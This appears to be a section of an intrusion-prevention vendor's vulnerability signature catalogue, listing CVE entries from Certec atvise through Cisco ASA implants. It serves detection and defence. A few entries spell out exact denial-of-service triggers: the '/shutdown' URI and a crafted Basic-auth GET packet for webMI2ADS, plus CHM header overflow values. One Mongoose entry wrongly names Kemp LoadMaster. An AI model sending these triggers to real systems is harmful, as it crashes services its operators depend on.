
sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Certec Atvise

Type:

Input Validation

Description:

There is a denial of service vulnerability in Certec atvise webMI2ADS web server. The device can be shut down by sending a crafted HTTP request with a request URI "/shutdown".

Situation:

HTTP_CSU-Certec-atvise-webMI2ADS-Denial-Of-Service

References:

CVE-2011-4882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4882

OSVDB-76276
http://www.osvdb.org/76276

Certec-atvise-webMI2ADS-Denial-of-Service-2

About this vulnerability:	Certec atvise webMI2ADS version 1.0 and older denial of service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Certec Atvise
Type:	Malfunction
Description:	A vulnerability in webMI2ADS.exe that allows a remote attacker to crash the service by sending the specially crafted HTTP packet 'GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n'.
Situation:	HTTP_CS-Certec-atvise-webMI2ADS-Denial-of-Service-2

Cerulean-Studios-Trillian-Oscar-Image-Filename-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Cerulean Studios Trillian

Risk:

High

First detected in:

sgpkg-ips-197-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trillian

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Cerulean Studios' Trillian instant messenger client application. The application has a boundary error when processing images in the received messages. This could be exploited by remote attackers by sending a malicious message to the target AIM screen name. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user.

Situation:

IM-TCP_SS-Cerulean-Studios-Trillian-Oscar-Image-Filename-Stack-Buffer-Overflow

References:

CVE-2008-5401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5401

BID-32645
http://www.securityfocus.com/bid/32645

OSVDB-50472
http://www.osvdb.org/50472

Cerulean-Studios-Trillian-Oscar-Tag-Handling-Heap-Buffer-Overflow

About this vulnerability:

A heap buffer vulnerability in Cerulean Studios' Trillian

Risk:

High

First detected in:

sgpkg-ips-197-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trillian

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Cerulean Studios' Trillian instant messenger client application. The application does not validate input properly when parsing tags in AIM messages. This could be exploited by remote attackers by sending a malicious message to the target user. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user.

Situation:

IM-TCP_SS-Cerulean-Studios-Trillian-Oscar-Tag-Handling-Heap-Buffer-Overflow

References:

CVE-2008-5403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5403

BID-32645
http://www.securityfocus.com/bid/32645

OSVDB-50474
http://www.osvdb.org/50474

Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894

About this vulnerability:

A vulnerability in Progress Software Kemp LoadMaster

Risk:

Moderate

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Cesanta Mongoose

Type:

Buffer Overflow

Description:

An attempt to exploit a vulnerability in Cesanta Mongoose

Situation:

Generic_CS-Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894

References:

CVE-2017-2894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2894

Cesanta-Mongoose-Parse_MQTT-DOS

About this vulnerability:

A vulnerability in Cesanta Mongoose

Risk:

High

First detected in:

sgpkg-ips-1222-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cesanta Mongoose

Type:

Infinite Loop

Description:

There exists a vulnerability in Cesanta Mongoose, version 6.16, which allows remote attackers to create a denial of service condition by sending crafted requests to a target system, due to the improper handling of objects in memory with the parse_mqtt function.

Situation:

Generic_TCP-Cesanta-Mongoose-Parse_MQTT-DOS
Generic_CS-Cesanta-Mongoose-Parse_MQTT-DOS

References:

CVE-2019-19307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19307

Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Cesanta Mongoose

Risk:

High

First detected in:

sgpkg-ips-1560-5242

Last changed:

sgpkg-ips-1560-5242

Platform:

Generic

Software:

Cesanta Mongoose

Type:

Malfunction

Description:

An out of bounds read vulnerability has been reported in Cesanta Mongoose. The vulnerability is due to improper handling of objects in memory within the parse_mqtt function. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to a targeted system. Successful exploitation of the vulnerability could cause denial-of-service conditions or, in the worst case, might cause disclosure of sensitive information.

Situation:

Generic_SS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
Generic_CS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read

References:

CVE-2019-12951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12951

Cesar-FTP-Mkd-Command-Buffer-Overflow

About this vulnerability:

A Cesar FTP Mkd Command Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cesar FTP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Cesar FTP, versions 0.99g and before, which allows remote attackers to execute arbitrary code via a long MKD command.

Situation:

FTP_CS-Cesar-FTP-Mkd-Command-Buffer-Overflow

References:

CVE-2006-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2961

BID-18586
http://www.securityfocus.com/bid/18586

OSVDB-26364
http://www.osvdb.org/26364

Cgit-Path-Parameter-Directory-Traversal-Information-Disclosure

About this vulnerability:

A vulnerability in Cgit

Risk:

Moderate

First detected in:

sgpkg-ips-1100-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cgit

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability exists in Cgit. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation could lead to the disclosure of the system files.

Situation:

HTTP_URI-Cgit-Path-Parameter-Directory-Traversal-Information-Disclosure

References:

CVE-2018-14912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14912

Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8542

About this vulnerability:

A vulnerability in Chakra Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8542

References:

CVE-2018-8542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8542

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556

About this vulnerability:

A vulnerability in Windows Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the Chackra scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556

References:

CVE-2018-8556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8556

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557

About this vulnerability:

A vulnerability in Windows Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the Chackra scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557

References:

CVE-2018-8557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8557

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505

References:

CVE-2018-8505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8505

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Chamilo-BigUpload-WebShell

About this vulnerability:

A vulnerability in Chamilo

Risk:

Moderate

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Generic

Software:

Chamilo

Type:

Input Validation

Description:

Improper handling of upload operations causes a vulnerability in Chamilo. A successful exploitation allows an attacker to upload PHP code to the target system.

Situation:

HTTP_CS-Chamilo-BigUpload-WebShell

References:

CVE-2023-4220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220

Chamilo-Remote-Command-Execution-CVE-2023-34960

About this vulnerability:

A vulnerability in Chamilo

Risk:

High

First detected in:

sgpkg-ips-1618-5242

Last changed:

sgpkg-ips-1618-5242

Platform:

Generic

Software:

Chamilo

Type:

Input Validation

Description:

An OS command execution vulnerability has been reported in Chamilo versions up to and including 1.11.18. The vulnerability is due to insufficient user input validation in wsConvertPpt function. A remote, unauthenticated attacker can exploit this vulnerability via a maliciously crafted SOAP request.

Situation:

File-TextId_Chamilo-Remote-Command-Execution-CVE-2023-34960

References:

CVE-2023-34960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34960

CHAOS-RAT-Infection-Traffic

About this vulnerability:	CHAOS RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1358-5242
Last changed:	sgpkg-ips-1358-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	CHAOS RAT infection traffic was detected.
Situation:	Generic_CS-CHAOS-RAT-Infection-Traffic

Chaos-RAT-XSS-To-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Chaos Remote Access Tool detected

Risk:

High

First detected in:

sgpkg-ips-1732-5242

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

Chaos RAT

Type:

Input Validation

Description:

A vulnerability in Chaos Remote Access Tool, version 5.0.8, which allows remote attackers to execute arbitrary code when generating a new executable.

Situation:

HTTP_CRL-Chaos-RAT-XSS-To-RCE

References:

CVE-2024-30850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30850

Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow

About this vulnerability:

Chasys Draw IES BMP Image Processing Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Chasys Draw

Type:

Buffer Overflow

Description:

An input validation vulnerability exists in Chasys Draw IES BMP file parsing. An attacker could trigger this issue via modified BMP file.

Situation:

File-Binary_Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow

References:

CVE-2013-3928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3928

BID-61463
http://www.securityfocus.com/bid/61463

OSVDB-95689
http://www.osvdb.org/95689

Check-Point-Firewall-1-HTTP-Parsing-Format-String-Vulnerabilities

About this vulnerability:

A vulnerability in Check Point Software Technologies Firewall-1

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FireWall-1

Type:

Buffer Overflow

Description:

A vulnerability exists in the HTTP protocol parser used by several components of Check Point Firewall-1. The vulnerability can be triggered by sending certain malformed fields in an HTTP request, and may be exploited to crash the firewall or to execute code of the attacker's choice on the firewall. This vulnerability has been described as a format-string problem, however, it has been found that format specifiers are not required to trigger the vulnerability. The behaviour of the attack target will vary depending on the sophistication of the exploit attempt. A simple exploit with sufficient characters in the scheme of the requested URI may cause the in.httpd process handling the request to crash due to an access violation (raising a SIGSEGV). This occurs due to an overflow on the heap. It is possible that this may be exploited to cause arbitrary code execution. The simple exploits do not cause a denial of service as the fwd process will re-start in.ahttpd if there is not one currently executing when another HTTP request is received. A stack trace is shown below from an in.ahttpd process under attack, showing the result of running the exploit. It is believed the SIGSEGV is caused by an overflow in the heap into a free()'d block whose pointers are now invalid causing an access violation when they are dereferenced during a malloc() call.

Situation:

HTTP_CSU-Too-Large-URI-Scheme

References:

CVE-2004-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0039

BID-9581
http://www.securityfocus.com/bid/9581

Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919

About this vulnerability:

A vulnerability in Check Point Security Gateway

Risk:

High

First detected in:

sgpkg-ips-1731-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

Check Point Security Gateway

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in Check Point Security Gateways. A remote, unauthenticated attacker can leverage this vulnerability to obtain sensitive information such as passwords.

Situation:

HTTP_CS-Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919

References:

CVE-2024-24919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24919

Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow

About this vulnerability:

A vulnerability in Check Point Software Technologies Provider-1

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FireWall-1

Type:

Malfunction

Description:

There is a vulnerability in the way Check Point VPN-1 handles the negotiation of a VPN tunnel with a remote client. It is possible for a malicious client to craft a malformed packet designed to generate a memory write violation on the remote server. A successful attack would cause restart of the VPN process on the Checkpoint firewall. When the vulnerability is exploited, an unhandled memory write violation is triggered in the CheckPoint VPN process due to a null pointer dereference. This will cause the remote ISAKMP service to terminate. After the service terminates, it will be restarted by the VPN-1 supervisor module, and begin to service ISAKMP requests again.

Situation:

Generic_UDP-Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow

References:

CVE-2004-0699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0699

BID-10820
http://www.securityfocus.com/bid/10820

OSVDB-8290
http://www.osvdb.org/8290

CHM-Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow

About this vulnerability:

itss.dll parses compiled HTML help files incorrectly allowing buffer overflow

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer; Microsoft Outlook; Microsoft Outlook Express

Type:

Buffer Overflow

Description:

A compiled HTML help file (.CHM) with the "chunk length" header field set to anything between 0xFFFFFFE8 and 0xFFFFFFFF will cause an integer overflow when allocating memory, allowing arbitrary code execution with the user's privileges. Internet Explorer and Outlook use the vulnerable component to display .chm files, and these applications can open the files without user interaction when using the 'ms-its' protocol specification.

Situation:

HTTP_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
File-Binary_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow

References:

CVE-2005-1208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1208

BID-13953
http://www.securityfocus.com/bid/13953

MS05-026
http://technet.microsoft.com/security/bulletin/MS05-026

Chrome-Remote-Desktop-Usage

About this vulnerability:	Chrome Remote Desktop Usage
Risk:	Low
First detected in:	sgpkg-ips-456-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Google Chrome Remote Desktop
Type:	Remote Control
Description:	Google's Chrome Remote Desktop is a remote control browser extension that allows sharing of desktop connections across machines. Use of this kind of applications may be considered a security risk in controlled environments. Chrome Remote Desktop uses also Google Talk technology for sending its messages.
Situation:	Generic_UDP-Chrome-Remote-Desktop-Usage Generic_Google-Talk-Instant-Messaging-Network-Usage

Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass

About this vulnerability:

A vulnerability in Chromium and Webkit

Risk:

Moderate

First detected in:

sgpkg-ips-1484-5242

Last changed:

sgpkg-ips-1484-5242

Platform:

Generic

Software:

Chrome; Microsoft Edge; Safari

Type:

Malfunction

Description:

An iframe sandbox security bypass vulnerability has been reported in Chromium PopupBlocker (CVE-2021-30533) and Webkit (CVE-2021-1765). This vulnerability allows a maliciously crafted iframe to bypass the restrictions intended to prevent automatic redirections, which can be used in malvertising campaigns.

Situation:

File-Text_Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass

References:

CVE-2021-30533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30533

Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632

About this vulnerability:

An attempt to exploit a vulnerability in Chromium detected

Risk:

High

First detected in:

sgpkg-ips-1389-5242

Last changed:

sgpkg-ips-1389-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Chromium detected.

Situation:

File-Text_Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632

References:

CVE-2021-30632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30632

Chromium-V8-Turbofan-Type-Confusion

About this vulnerability:

An attempt to exploit a vulnerability in Chromium detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Chromium detected.

Situation:

File-Text_Chromium-V8-Turbofan-Type-Confusion

References:

CVE-2020-16009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009

Chunked-HTTP-1.0-Response

About this vulnerability:	Chunked transfer encoding in an HTTP/1.0 response
Risk:	Low
First detected in:	sgpkg-ips-1164-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	Chunked transfer encoding is not defined for HTTP/1.0, however some systems including browsers may interpret a Transfer-Encoding header within an HTTP/1.0 response. This vulnerability may be exploited in an attempt to evade inspection.
Situation:	HTTP_SHS-Chunked-HTTP-1.0-Response

ChurchInfo-Authenticated-RCE

About this vulnerability:

A vulnerability in ChurchInfo.

Risk:

High

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Generic

Software:

ChurchInfo

Type:

Input Validation

Description:

A vulnerability in the logic in the CartView.php page of ChurchInfo, versions 1.2.13 through 1.3.0, which allows remote attackers to execute arbitrary code by uploading an attachment for a draft email which will then be placed in the /tmp_attach/ folder of the ChurchInfo web server, which can then be executed by the web daemon by browsing the location of the uploaded file.

Situation:

HTTP_CS-ChurchInfo-Authenticated-RCE

References:

CVE-2021-43258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43258

CirceOS-SaveWeb-Portal-Remote-File-Include-Vulnerability

About this vulnerability:

CisceOS SaveWeb Remote File Include Vulnerability

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CirceOS SaveWeb

Type:

Input Validation

Description:

The CirceOS SaveWeb Portal is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.

Situation:

HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise-2
HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise

References:

CVE-2006-4012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4012

BID-19306
http://www.securityfocus.com/bid/19306

CirceOS-SaveWeb-Portal-Site-Path-Remote-File-Include-Vulnerability

About this vulnerability:

CisceOS SaveWeb Remote File Include Vulnerability

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CirceOS SaveWeb

Type:

Input Validation

Description:

The CirceOS SaveWeb Portal is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.

Situation:

HTTP_CRL-CirceOS-SaveWeb-Site-Path-Remote-Code-Injection-Compromise

References:

CVE-2005-2687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2687

BID-19306
http://www.securityfocus.com/bid/19306

Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580

About this vulnerability:

A vulnerability in Cisco Adaptive Security Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1381-5242

Last changed:

sgpkg-ips-1381-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in the web services interface of Cisco Adaptive Security Appliance Software. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user into clicking a crafted link. Successful exploitation may allow the attacker to execute arbitrary script code in the context of the interface.

Situation:

HTTP_CRL-Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580

References:

CVE-2020-3580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3580

Cisco-Adaptive-Security-Appliance-IKEv1-And-IKE2-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Cisco Systems Adaptive Security Appliance (ASA)

Risk:

Moderate

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Buffer Overflow

Description:

Arbitrary code can be run with kernel privileges by exploiting a heap buffer overflow caused by incorrect handling of IKE packets in the Cisco ASA appliance.

Situation:

Generic_UDP-Cisco-Adaptive-Security-Appliance-IKEv1-And-IKEv2-Heap-Buffer-Overflow

References:

CVE-2016-1287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1287

Cisco-Adaptive-Security-Appliance-Information-Disclosure

About this vulnerability:

A vulnerability in Cisco Adaptive Security Appliance

Risk:

High

First detected in:

sgpkg-ips-1719-5242

Last changed:

sgpkg-ips-1719-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Cisco Adaptive Security Appliance (ASA). A remote, unauthenticated attacker can exploit this vulnerability to retrieve memory contents by sending a crafted HTTP GET request.

Situation:

HTTP_CSU-Cisco-Adaptive-Security-Appliance-Information-Disclosure

References:

CVE-2020-3259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3259

Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command

About this vulnerability:

A Cisco Adaptive Security Appliance Invalid-CLI-Command vulnerability

Risk:

High

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Buffer Overflow

Description:

A vulnerability in multiple versions of Cisco Adaptive Security Appliance that allows remote attackers to gain privileges via invalid CLI commands. This vulnerability was released by Shadow Brokers named EPICBANANA.

Situation:

Telnet_CS-Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command

References:

CVE-2016-6367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6367

Cisco-Adaptive-Security-Appliance-SNMP-Buffer-Overflow

About this vulnerability:

A Cisco Adaptive Security Appliance SNMP Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Buffer Overflow

Description:

A vulnerability in multiple versions of Cisco Adaptive Security Appliance that allows remote attackers to execute arbitrary code by sending crafted SNMP messages. This vulnerability was released by Shadow Brokers named ExtraBacon.

Situation:

SNMP-UDP_Cisco-Adaptive-Security-Appliance-SNMP-Buffer-Overflow

References:

CVE-2016-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6366

Cisco-Adaptive-Security-Appliance-SNMP-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Cisco ASA SNMP

Risk:

High

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software. This allows an attacker to execute arbitrary code and obtain full system control of the affected system. This vulnerability has been utilized by the ExtraBacon exploit.

Situation:

Generic_UDP-Cisco-ASA-SNMP-ExtraBacon-Exploit
SNMP-UDP_Cisco-ASA-SNMP-ExtraBacon-Exploit

References:

CVE-2016-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6366

Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read

About this vulnerability:

An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected.

Situation:

HTTP_CSU-Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read

References:

CVE-2020-3452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452

Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free

About this vulnerability:

A vulnerability in Cisco Systems Adaptive Security Appliance (ASA)

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Malfunction

Description:

Improper XML parsing causes a double free vulnerability in Cisco ASA. A successful attack can allow arbitrary code execution.

Situation:

HTTP_CS-Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free

References:

CVE-2018-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0101

Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Cisco Systems AnyConnect

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cisco Systems AnyConnect

Type:

Malfunction

Description:

A remote code execution vulnerability exist in the ActiveX control which aids in downloading and executing the actual Cisco AnyConnect VPN Client. The vulnerability is due to the ActiveX control failing to properly validate the authenticity of the downloaded executable when the client is deployed from the VPN headend.

Situation:

HTTP_SS-Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
File-Text_Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution

References:

CVE-2011-2039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2039

OSVDB-72714
http://www.osvdb.org/72714

Cisco-AnyConnect-VPN-Client-Software-Downgrade

About this vulnerability:

A vulnerability in Cisco Systems AnyConnect Secure Mobility Client

Risk:

Moderate

First detected in:

sgpkg-ips-483-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems AnyConnect

Type:

Buffer Overflow

Description:

There is a software downgrade flaw in Cisco AnyConnect VPN client. The vulnerability is due to the WebLaunch component failing to properly validate the version of the vpndownloader.exe program when the client is deployed from the VPN headend. By enticing a user to open a specially crafted web page, a remote attacker can exploit this vulnerability to install an older version of vpndownloader.exe which is vulnerable to previously patch issues. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_Cisco-AnyConnect-VPN-Client-Software-Downgrade

References:

CVE-2012-2494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2494

OSVDB-83159
http://www.osvdb.org/83159

Cisco-ASA-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Adaptive Security Appliance

Risk:

High

First detected in:

sgpkg-ips-1158-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Directory Traversal

Description:

A vulnerability in Cisco Adaptive Security Appliance which allows remote attackers to gather contents of Cisco's VPN web service including directories and files through a directory traversal.

Situation:

HTTP_CSU-Cisco-ASA-Directory-Traversal

References:

CVE-2018-0296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296

Cisco-ASA-Line-Dancer-Malware-Implant-Interaction

About this vulnerability:	An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Risk:	High
First detected in:	sgpkg-ips-1722-5242
Last changed:	sgpkg-ips-1722-5242
Platform:	Generic
Software:	Cisco Adaptive Security Appliance
Type:	Input Validation
Description:	Line Dancer is an in-memory implant targeting Cisco Adaptive Security Appliance (ASA) devices. It enabling threat actors to upload and execute arbitrary shellcode/commands received from the "host-scan-reply" field of the request. This fingerprint does not detect the installation of the implant but the implant's interaction only.
Situation:	File-Text_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction File-TextId_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction

Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359

About this vulnerability:

An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected

Risk:

High

First detected in:

sgpkg-ips-1722-5242

Last changed:

sgpkg-ips-1722-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Backdoor

Description:

Line Runner is a persistent Lua-based webshell targeting the Cisco Adaptive Security Appliance (ASA) WebVPN device customization functionality. It offers the ability to run arbitrary Lua code sent via HTTP GET requests to legitimate Cisco ASA WebVPN/AnyConnect URIs. This fingerprint does not detect the implantation of the webshell but its interaction only.

Situation:

HTTP_CRL-Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359

References:

CVE-2024-20359
